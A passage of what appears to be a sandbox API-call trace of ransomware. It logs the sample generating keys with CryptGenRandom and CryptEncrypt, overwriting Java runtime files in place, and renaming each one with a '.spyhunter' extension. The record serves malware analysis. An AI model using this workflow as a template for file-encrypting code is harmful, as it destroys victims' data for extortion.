(in: hFile=0xf4, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f4ec, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f4ec*=0x30, lpOverlapped=0x0) returned 1 [0124.280] CloseHandle (hObject=0xf4) returned 1 [0124.280] GetProcessHeap () returned 0x2c0000 [0124.280] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0124.280] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\WindowsAccessBridge-32.dll.spyhunter") returned 77 [0124.281] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\WindowsAccessBridge-32.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\windowsaccessbridge-32.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\WindowsAccessBridge-32.dll.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\windowsaccessbridge-32.dll.spyhunter")) returned 1 [0124.281] GetProcessHeap () returned 0x2c0000 [0124.281] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0124.281] GetProcessHeap () returned 0x2c0000 [0124.281] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0124.281] GetProcessHeap () returned 0x2c0000 [0124.282] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e03408 | out: hHeap=0x2c0000) returned 1 [0124.282] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f528 | out: pbBuffer=0x270f528) returned 1 [0124.282] GetProcessHeap () returned 0x2c0000 [0124.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0124.282] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f520*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f520*=0x30) returned 1 [0124.282] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\fontconfig.properties.src" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\fontconfig.properties.src"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf4 [0124.282] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\fontconfig.properties.src") returned 66 [0124.282] StrStrW (lpFirst="fontconfig.properties.src", lpSrch=".txt") returned 0x0 [0124.282] GetProcessHeap () returned 0x2c0000 [0124.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0124.283] ReadFile (in: hFile=0xf4, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f4e4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270f4e4*=0x2800, lpOverlapped=0x0) returned 1 [0124.363] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0124.363] WriteFile (in: hFile=0xf4, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f4e4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270f4e4*=0x2800, lpOverlapped=0x0) returned 1 [0124.363] GetProcessHeap () returned 0x2c0000 [0124.363] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0124.363] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0124.363] WriteFile (in: hFile=0xf4, lpBuffer=0x270f524*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f4e4, lpOverlapped=0x0 | out: lpBuffer=0x270f524*, lpNumberOfBytesWritten=0x270f4e4*=0x4, lpOverlapped=0x0) returned 1 [0124.363] WriteFile (in: hFile=0xf4, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f4e4, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f4e4*=0x30, lpOverlapped=0x0) returned 1 [0124.363] CloseHandle (hObject=0xf4) returned 1 [0124.364] GetProcessHeap () returned 0x2c0000 [0124.364] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f05c68 [0124.364] wnsprintfW (in: pszDest=0x2f05c68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\fontconfig.properties.src.spyhunter") returned 76 [0124.364] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\fontconfig.properties.src" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\fontconfig.properties.src"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\fontconfig.properties.src.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\fontconfig.properties.src.spyhunter")) returned 1 [0124.365] GetProcessHeap () returned 0x2c0000 [0124.365] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f05c68 | out: hHeap=0x2c0000) returned 1 [0124.365] GetProcessHeap () returned 0x2c0000 [0124.365] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0124.365] GetProcessHeap () returned 0x2c0000 [0124.365] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e03e98 | out: hHeap=0x2c0000) returned 1 [0124.366] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f520 | out: pbBuffer=0x270f520) returned 1 [0124.366] GetProcessHeap () returned 0x2c0000 [0124.367] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0124.367] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f518*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f518*=0x30) returned 1 [0124.367] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\i386\\jvm.cfg" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\i386\\jvm.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf4 [0124.368] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\i386\\jvm.cfg") returned 53 [0124.368] StrStrW (lpFirst="jvm.cfg", lpSrch=".txt") returned 0x0 [0124.368] GetProcessHeap () returned 0x2c0000 [0124.368] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0124.368] ReadFile (in: hFile=0xf4, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f4dc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270f4dc*=0x2ae, lpOverlapped=0x0) returned 1 [0124.374] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0xfffffd52, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0124.374] WriteFile (in: hFile=0xf4, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2ae, lpNumberOfBytesWritten=0x270f4dc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270f4dc*=0x2ae, lpOverlapped=0x0) returned 1 [0124.375] GetProcessHeap () returned 0x2c0000 [0124.375] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0124.375] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0124.375] WriteFile (in: hFile=0xf4, lpBuffer=0x270f51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f4dc, lpOverlapped=0x0 | out: lpBuffer=0x270f51c*, lpNumberOfBytesWritten=0x270f4dc*=0x4, lpOverlapped=0x0) returned 1 [0124.375] WriteFile (in: hFile=0xf4, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f4dc, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f4dc*=0x30, lpOverlapped=0x0) returned 1 [0124.375] CloseHandle (hObject=0xf4) returned 1 [0124.375] GetProcessHeap () returned 0x2c0000 [0124.375] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f05c68 [0124.375] wnsprintfW (in: pszDest=0x2f05c68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\i386\\jvm.cfg.spyhunter") returned 63 [0124.375] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\i386\\jvm.cfg" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\i386\\jvm.cfg"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\i386\\jvm.cfg.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\i386\\jvm.cfg.spyhunter")) returned 1 [0124.377] GetProcessHeap () returned 0x2c0000 [0124.377] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f05c68 | out: hHeap=0x2c0000) returned 1 [0124.377] GetProcessHeap () returned 0x2c0000 [0124.377] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0124.377] GetProcessHeap () returned 0x2c0000 [0124.377] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f268a8 | out: hHeap=0x2c0000) returned 1 [0124.379] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f518 | out: pbBuffer=0x270f518) returned 1 [0124.379] GetProcessHeap () returned 0x2c0000 [0124.379] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0124.379] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f510*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f510*=0x30) returned 1 [0124.379] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\fonts\\LucidaTypewriterRegular.ttf" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\fonts\\lucidatypewriterregular.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf4 [0124.381] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\fonts\\LucidaTypewriterRegular.ttf") returned 74 [0124.381] StrStrW (lpFirst="LucidaTypewriterRegular.ttf", lpSrch=".txt") returned 0x0 [0124.381] GetProcessHeap () returned 0x2c0000 [0124.381] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0124.381] ReadFile (in: hFile=0xf4, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f4d4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270f4d4*=0x2800, lpOverlapped=0x0) returned 1 [0124.710] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0124.710] WriteFile (in: hFile=0xf4, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f4d4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270f4d4*=0x2800, lpOverlapped=0x0) returned 1 [0124.710] GetProcessHeap () returned 0x2c0000 [0124.710] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0124.710] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0124.710] WriteFile (in: hFile=0xf4, lpBuffer=0x270f514*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f4d4, lpOverlapped=0x0 | out: lpBuffer=0x270f514*, lpNumberOfBytesWritten=0x270f4d4*=0x4, lpOverlapped=0x0) returned 1 [0124.836] WriteFile (in: hFile=0xf4, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f4d4, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f4d4*=0x30, lpOverlapped=0x0) returned 1 [0124.836] CloseHandle (hObject=0xf4) returned 1 [0124.836] GetProcessHeap () returned 0x2c0000 [0124.836] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0124.837] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\fonts\\LucidaTypewriterRegular.ttf.spyhunter") returned 84 [0124.837] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\fonts\\LucidaTypewriterRegular.ttf" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\fonts\\lucidatypewriterregular.ttf"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\fonts\\LucidaTypewriterRegular.ttf.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\fonts\\lucidatypewriterregular.ttf.spyhunter")) returned 1 [0124.837] GetProcessHeap () returned 0x2c0000 [0124.838] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0124.838] GetProcessHeap () returned 0x2c0000 [0124.838] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0124.838] GetProcessHeap () returned 0x2c0000 [0124.838] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee4d30 | out: hHeap=0x2c0000) returned 1 [0124.838] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f518 | out: pbBuffer=0x270f518) returned 1 [0124.838] GetProcessHeap () returned 0x2c0000 [0124.838] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0124.838] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f510*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f510*=0x30) returned 1 [0124.838] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\jvm.hprof.txt" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\jvm.hprof.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf4 [0124.839] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\jvm.hprof.txt") returned 54 [0124.839] StrStrW (lpFirst="jvm.hprof.txt", lpSrch=".txt") returned=".txt" [0124.839] lstrlenW (lpString=".txt") returned 4 [0124.839] lstrlenW (lpString=".txt") returned 4 [0124.839] GetProcessHeap () returned 0x2c0000 [0124.839] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0124.839] ReadFile (in: hFile=0xf4, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f4d4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270f4d4*=0x1082, lpOverlapped=0x0) returned 1 [0125.085] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0xffffef7e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0125.085] WriteFile (in: hFile=0xf4, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x1082, lpNumberOfBytesWritten=0x270f4d4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270f4d4*=0x1082, lpOverlapped=0x0) returned 1 [0125.085] GetProcessHeap () returned 0x2c0000 [0125.085] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0125.085] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0125.085] WriteFile (in: hFile=0xf4, lpBuffer=0x270f514*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f4d4, lpOverlapped=0x0 | out: lpBuffer=0x270f514*, lpNumberOfBytesWritten=0x270f4d4*=0x4, lpOverlapped=0x0) returned 1 [0125.085] WriteFile (in: hFile=0xf4, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f4d4, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f4d4*=0x30, lpOverlapped=0x0) returned 1 [0125.085] CloseHandle (hObject=0xf4) returned 1 [0125.086] GetProcessHeap () returned 0x2c0000 [0125.086] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0125.086] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\jvm.hprof.txt.spyhunter") returned 64 [0125.086] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\jvm.hprof.txt" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\jvm.hprof.txt"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\jvm.hprof.txt.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\jvm.hprof.txt.spyhunter")) returned 1 [0125.086] GetProcessHeap () returned 0x2c0000 [0125.086] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0125.086] GetProcessHeap () returned 0x2c0000 [0125.086] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0125.086] GetProcessHeap () returned 0x2c0000 [0125.087] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed3650 | out: hHeap=0x2c0000) returned 1 [0125.087] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f510 | out: pbBuffer=0x270f510) returned 1 [0125.087] GetProcessHeap () returned 0x2c0000 [0125.087] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0125.087] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f508*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f508*=0x30) returned 1 [0125.087] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\jsse.jar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\jsse.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf4 [0125.092] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\jsse.jar") returned 49 [0125.092] StrStrW (lpFirst="jsse.jar", lpSrch=".txt") returned 0x0 [0125.092] GetProcessHeap () returned 0x2c0000 [0125.092] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0125.092] ReadFile (in: hFile=0xf4, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f4cc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270f4cc*=0x2800, lpOverlapped=0x0) returned 1 [0125.240] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0125.240] WriteFile (in: hFile=0xf4, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f4cc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270f4cc*=0x2800, lpOverlapped=0x0) returned 1 [0125.240] GetProcessHeap () returned 0x2c0000 [0125.240] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0125.240] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0125.241] WriteFile (in: hFile=0xf4, lpBuffer=0x270f50c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f4cc, lpOverlapped=0x0 | out: lpBuffer=0x270f50c*, lpNumberOfBytesWritten=0x270f4cc*=0x4, lpOverlapped=0x0) returned 1 [0125.259] WriteFile (in: hFile=0xf4, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f4cc, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f4cc*=0x30, lpOverlapped=0x0) returned 1 [0125.259] CloseHandle (hObject=0xf4) returned 1 [0125.260] GetProcessHeap () returned 0x2c0000 [0125.260] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0125.260] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\jsse.jar.spyhunter") returned 59 [0125.260] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\jsse.jar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\jsse.jar"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\jsse.jar.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\jsse.jar.spyhunter")) returned 1 [0125.261] GetProcessHeap () returned 0x2c0000 [0125.261] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0125.261] GetProcessHeap () returned 0x2c0000 [0125.261] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0125.261] GetProcessHeap () returned 0x2c0000 [0125.261] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed3f40 | out: hHeap=0x2c0000) returned 1 [0125.263] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f508 | out: pbBuffer=0x270f508) returned 1 [0125.263] GetProcessHeap () returned 0x2c0000 [0125.263] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0125.263] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f500*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f500*=0x30) returned 1 [0125.263] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\jfr\\profile.jfc" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\jfr\\profile.jfc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf4 [0125.264] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\jfr\\profile.jfc") returned 56 [0125.264] StrStrW (lpFirst="profile.jfc", lpSrch=".txt") returned 0x0 [0125.264] GetProcessHeap () returned 0x2c0000 [0125.264] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0125.264] ReadFile (in: hFile=0xf4, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f4c4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270f4c4*=0x2800, lpOverlapped=0x0) returned 1 [0125.266] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0125.266] WriteFile (in: hFile=0xf4, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f4c4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270f4c4*=0x2800, lpOverlapped=0x0) returned 1 [0125.267] GetProcessHeap () returned 0x2c0000 [0125.267] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0125.267] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0125.267] WriteFile (in: hFile=0xf4, lpBuffer=0x270f504*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f4c4, lpOverlapped=0x0 | out: lpBuffer=0x270f504*, lpNumberOfBytesWritten=0x270f4c4*=0x4, lpOverlapped=0x0) returned 1 [0125.268] WriteFile (in: hFile=0xf4, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f4c4, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f4c4*=0x30, lpOverlapped=0x0) returned 1 [0125.268] CloseHandle (hObject=0xf4) returned 1 [0125.268] GetProcessHeap () returned 0x2c0000 [0125.268] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0125.268] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\jfr\\profile.jfc.spyhunter") returned 66 [0125.268] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\jfr\\profile.jfc" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\jfr\\profile.jfc"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\jfr\\profile.jfc.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\jfr\\profile.jfc.spyhunter")) returned 1 [0125.271] GetProcessHeap () returned 0x2c0000 [0125.271] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0125.271] GetProcessHeap () returned 0x2c0000 [0125.271] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0125.271] GetProcessHeap () returned 0x2c0000 [0125.271] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e60180 | out: hHeap=0x2c0000) returned 1 [0125.271] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f508 | out: pbBuffer=0x270f508) returned 1 [0125.271] GetProcessHeap () returned 0x2c0000 [0125.271] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0125.271] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f500*=0x20, dwBufLen=0x30 | out: 